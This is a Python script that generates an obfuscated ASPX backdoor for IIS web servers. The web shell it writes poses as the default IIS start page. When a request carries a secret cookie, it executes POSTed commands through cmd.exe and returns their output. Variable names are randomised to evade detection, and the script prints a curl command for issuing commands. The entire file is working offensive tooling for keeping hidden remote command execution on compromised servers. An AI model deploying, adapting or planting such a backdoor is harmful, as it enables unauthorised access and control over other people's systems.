aspx-backdoor.py


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135

#!/usr/bin/env python3

import os
import re
import random
import string
from textwrap import dedent
from argparse import ArgumentParser

def obfuscate(s):
    pattern = r'\{\*(.*?)\*\}'
    placeholder_values = {}

    def get_or_generate_random_string(match):
        placeholder = match.group(1)
        if placeholder not in placeholder_values:
            placeholder_values[placeholder] = ''.join(random.choice(string.ascii_lowercase) for _ in range(8))
        return placeholder_values[placeholder]

    result_string = re.sub(pattern, get_or_generate_random_string, s)

    return result_string

def generate_aspx_backdoor(args):
    code = '200'
    status = '200 OK'
    iisstart_template = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
}

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>'''
    lines = iisstart_template.split('\n')
    processed_lines = ['"' + line.replace('"', '""') + '" & vbCrLf & _' for line in lines]
    response = '\n'.join(processed_lines)
    response = response.rstrip(' & vbCrLf & _')

    backdoor = f'''<%@ Page Language="VB" Debug="true" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.Web" %>

<script runat="server">
    Sub Page_Load(ByVal {{*sender*}} As Object, ByVal {{*e*}} As EventArgs)
        Dim {{*cookieMarker*}} As HttpCookie = Request.Cookies("{args.cookie_name}")
        If {{*cookieMarker*}} IsNot Nothing AndAlso {{*cookieMarker*}}.Value = "{args.password}" Then
            Dim {{*command1*}} As String = {{*GetCommandFromPost*}}()

            If Not String.IsNullOrEmpty({{*command1*}}) Then
                {{*command1*}} = HttpUtility.UrlDecode({{*command1*}})
                {{*ExecuteCommand*}}({{*command1*}})
            End If
        Else
            Response.StatusCode = {code}
            Response.Status = "{status}"
            Response.Write({response})
        End If
    End Sub

    Function {{*GetCommandFromPost*}}() As String
        Dim {{*commandParam*}} As String = "cmd="
        Dim {{*command2*}} As String = Nothing

        If Request.HttpMethod = "POST" Then
            Using {{*reader*}} As New StreamReader(Request.InputStream)
                Dim {{*requestBody*}} As String = {{*reader*}}.ReadToEnd()

                Dim {{*cmdIndex*}} As Integer = {{*requestBody*}}.IndexOf({{*commandParam*}})
                If {{*cmdIndex*}} <> -1 Then
                    {{*command2*}} = {{*requestBody*}}.Substring({{*cmdIndex*}} + {{*commandParam*}}.Length)
                End If
            End Using
        End If

        Return {{*command2*}}
    End Function

    Sub {{*ExecuteCommand*}}(ByVal {{*command3*}} As String)
        Dim {{*myProcess*}} As New Process()
        Dim {{*myProcessStartInfo*}} As New ProcessStartInfo("cmd.exe")
        {{*myProcessStartInfo*}}.UseShellExecute = False
        {{*myProcessStartInfo*}}.RedirectStandardOutput = True
        {{*myProcessStartInfo*}}.Arguments = "/c " & {{*command3*}}
        {{*myProcess*}}.StartInfo = {{*myProcessStartInfo*}}
        {{*myProcess*}}.Start()

        Dim {{*myStreamReader*}} As StreamReader = {{*myProcess*}}.StandardOutput
        Dim {{*myString*}} As String = {{*myStreamReader*}}.ReadToEnd()
        {{*myProcess*}}.Close()
        Response.Write({{*myString*}})
    End Sub
</script>'''

    with open(f'backdoor_{args.cookie_name}:{args.password}.aspx', 'w') as fh:
        fh.write(obfuscate(backdoor))

    print(f'[INFO] created aspx backdoor as "backdoor_{args.cookie_name}:{args.password}.aspx"')
    print('[INFO] issue commands with:')
    print('curl http://example.com/backdoor.aspx -H "Cookie: {args.cookie}={args.password}" -d "cmd=whoami /priv" -X POST')


if __name__ == '__main__':
    parser = ArgumentParser()
    parser.add_argument('-c', '--cookie-name', required=True)
    parser.add_argument('-p', '--password', required=True)
    args = parser.parse_args()

    generate_aspx_backdoor(args)